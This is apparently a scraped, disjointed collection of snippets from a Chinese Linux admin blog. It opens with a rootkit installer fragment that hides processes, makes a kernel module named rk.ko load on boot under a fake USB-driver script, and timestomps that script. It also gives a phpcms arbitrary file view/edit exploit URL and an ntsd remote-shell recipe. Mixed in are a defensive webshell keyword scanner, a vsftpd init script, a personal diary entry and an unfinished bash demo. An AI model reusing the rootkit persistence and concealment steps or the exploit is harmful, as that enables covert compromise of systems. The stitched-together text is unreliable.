$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1
##########load rk.ko on boot##########
cat > /etc/sysconfig/modules/ehci.modules << EOF
#!/bin/sh
#install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1
##########check iptables setting##########
if [ -f /sbin/iptables ]; then
echo "`/sbin/iptables -L INPUT | head -5`"
else
echo ""
echo "# lucky for u no iptables found"
fi
##########start syslogd##########
/sbin/syslogd -m 0
# ./setup 123 3333 //设
phpcms扫描木马功能,发现木马后,可以查看修改。
只要指定文件可以查看,可以修改,也可以创建,很厉害的功能。
利用地址:
http://192.168.0.203/phpcms/admin.php?mod=phpcms&file=safe&action=see_code&files=uploadfile/test.php

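#!/bin/bash
#scan webshell shell
# Defensive sweep of a web root: list every script file whose contents
# mention a keyword commonly seen in webshells (eval, system, exec,
# base64_decode) so an operator can review those files by hand. A hit is
# only a hint, not a verdict - legitimate code uses these names too.
dire=/data/   # web path
exname=.php   # .php; .jsp; .php3
key=eval      # system; exec; base64_decode

#######################################
# Print the path of every regular file under a directory whose name ends
# in the given suffix and whose contents contain the keyword
# (case-insensitive).
# Arguments: $1 - directory to walk
#            $2 - filename suffix (e.g. .php)
#            $3 - keyword to search for (treated as a grep pattern)
# Outputs:   matching paths, one per line, on stdout
# Returns:   0 when every grep batch matched, non-zero otherwise
#            (find propagates grep's status, so "no match" is non-zero)
#######################################
scan_webshell() {
  local dir=$1 ext=$2 kw=$3
  # find hands the file names straight to grep, so paths containing
  # spaces or glob characters are never word-split; -l prints each
  # file name once and stops reading that file at the first hit.
  find "$dir" -type f -name "*${ext}" -exec grep -il -- "$kw" {} +
}

# Results are appended to ./tmp for later inspection.
if [ -d "$dire" ]; then
  scan_webshell "$dire" "$exname" "$key" >> tmp
else
  printf 'scan webshell: %s is not a directory\n' "$dire" >&2
fi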
网站被黑后,如果网站动态页面,很难一一搜索,通过搜索webshell 里面常用的关键词,来节省一段时间。
实现方法很简单,思路就是这样。
遍历整个目录下的文件,搜索特定关键词(webshell里面的敏感关键词),然后重定向到一个文件。再检查这些文件,就快得多了。
#!/bin/bash
#by:key1088
#description:vsftpd
#conf:/etc/vsftpd/vsftp.conf
#cp vsftpd /etc/init.d/vsftpd
#chmod 755 /etc/init.d/vsftpd
#chkconfig --add vsftpd
#chkconfig vsftpd on
# Pull in the distribution's init-script helpers (status, ...). Without
# them this script cannot do its job, so it bows out quietly.
functions_lib=
for candidate in /etc/init.d/functions /etc/rc.d/init.d/functions; do
  if [ -f "$candidate" ]; then
    functions_lib=$candidate
    break
  fi
done
[ -n "$functions_lib" ] || exit 0
. "$functions_lib"
unset functions_lib candidate

vsftpd=/usr/local/sbin/vsftpd      # daemon binary
ftpconf=/etc/vsftpd/vsftpd.conf    # config file handed to the daemon
prog=vsftpd                        # process name looked up with pidof
RETVAL=0                           # exit status reported by the script
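#######################################
# Start the daemon unless an instance is already running.
# Globals:   prog, vsftpd, ftpconf (read); RETVAL (written)
# Outputs:   progress messages on stdout
# Returns:   1 if already running or the daemon did not come up, else 0
#######################################
start() {
  if [ -n "$(/sbin/pidof "$prog")" ]; then
    echo "$prog: already running"
    return 1
  fi
  echo "Starting $prog:"
  # Reset here: under "restart", stop() leaves RETVAL=1 when no instance
  # was running, which would otherwise turn a good start into
  # "Startup failure".
  RETVAL=0
  "$vsftpd" "$ftpconf" &
  # pidof is consulted right after launch; the daemon is expected to be
  # visible by its process name at this point.
  if [ -z "$(/sbin/pidof "$prog")" ]; then
    RETVAL=1
  fi
  if [ "$RETVAL" -ne 0 ]; then
    echo "Startup failure"
  else
    echo "Startup success"
  fi
  return "$RETVAL"
}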
#######################################
# Stop the daemon if an instance is running.
# Globals:   prog, vsftpd (read); RETVAL (written)
# Outputs:   progress messages on stdout
# Returns:   0 (status of the final echo); the real outcome is in RETVAL
#######################################
stop() {
  # RETVAL is deliberately not reset: a non-zero value on entry is
  # treated the same as "not running" (the dispatcher starts it at 0).
  [ -z "$(/sbin/pidof "$prog")" ] && RETVAL=1
  if [ "$RETVAL" -eq 0 ]; then
    echo "Stopping $prog:"
    killall "$vsftpd"
    RETVAL=$?
    if [ "$RETVAL" -eq 0 ]; then
      echo "Shutdown success"
    else
      echo "Shutdown failure"
    fi
  else
    echo "vsftpd no have run"
  fi
}
# Dispatch on the action verb; anything unknown prints usage and exits 1.
case "$1" in
  start)   start ;;
  stop)    stop ;;
  status)  status "$vsftpd"; RETVAL=$? ;;
  restart) stop; start ;;
  *)
    echo "Usage: $prog {start|stop|restart|status}"
    exit 1
    ;;
esac
exit "$RETVAL"
文件:
[root@book ~]# touch a.txt
[root@book ~]# chattr +i a.txt
目录:
[root@root root]# mkdir test
[root@root root]# rm -fr test
rm: cannot remove directory `test': Operation not permitted
看了几位大牛的blog,发现自己太浮躁了,太没有耐心了。想到什么做什么,没有一点计划性。但往往计划了,却不去坚持。
记得,高中读狼图腾的时候,发现狼为了捕捉猎物,会一动不动地等待几个小时。一旦时机成熟,立马行动。狼一直是我崇拜的偶像,
耐性要改一改了。如果人重复去做单一的事情,他就不是很简单,而我现在做不到。工作终于辞职下来了,看了看网上的招聘信息。linux方面,真的很少的。也许不是一个招聘的季节,也许不是一个做技术的城市。迷茫中、换工作,还是转城市。还是、、、、
远程机:ntsd -server tcp:port=1234 calc.exe
本机:ntsd -remote tcp:server=IP,port=1234
.shell
命令
脚本如下:
#!/bin/bash
#test $() and ${} and $(()) useges
#by:key1088@163.com
#mail:key1088@163.com
file=$(pwd)
echo $file
echo
echo '${file#*/}'
echo ${file#*/}
echo
echo '${file##*/}'
echo ${file##*/}
echo
echo '$(file%/*)'
echo ${file%%/*}
echo
echo '${file/cis7/cis8/}'
echo ${file/cis7/cis8/}
echo
echo '${file//cis7/cis8/}'
echo ${file//cis7/cis8/}
echo
echo '${file:0:5}'
echo ${file:0:5}
echo
echo '${file:5:5}'
echo ${file:5:5}
echo
echo '$(#file)'
echo $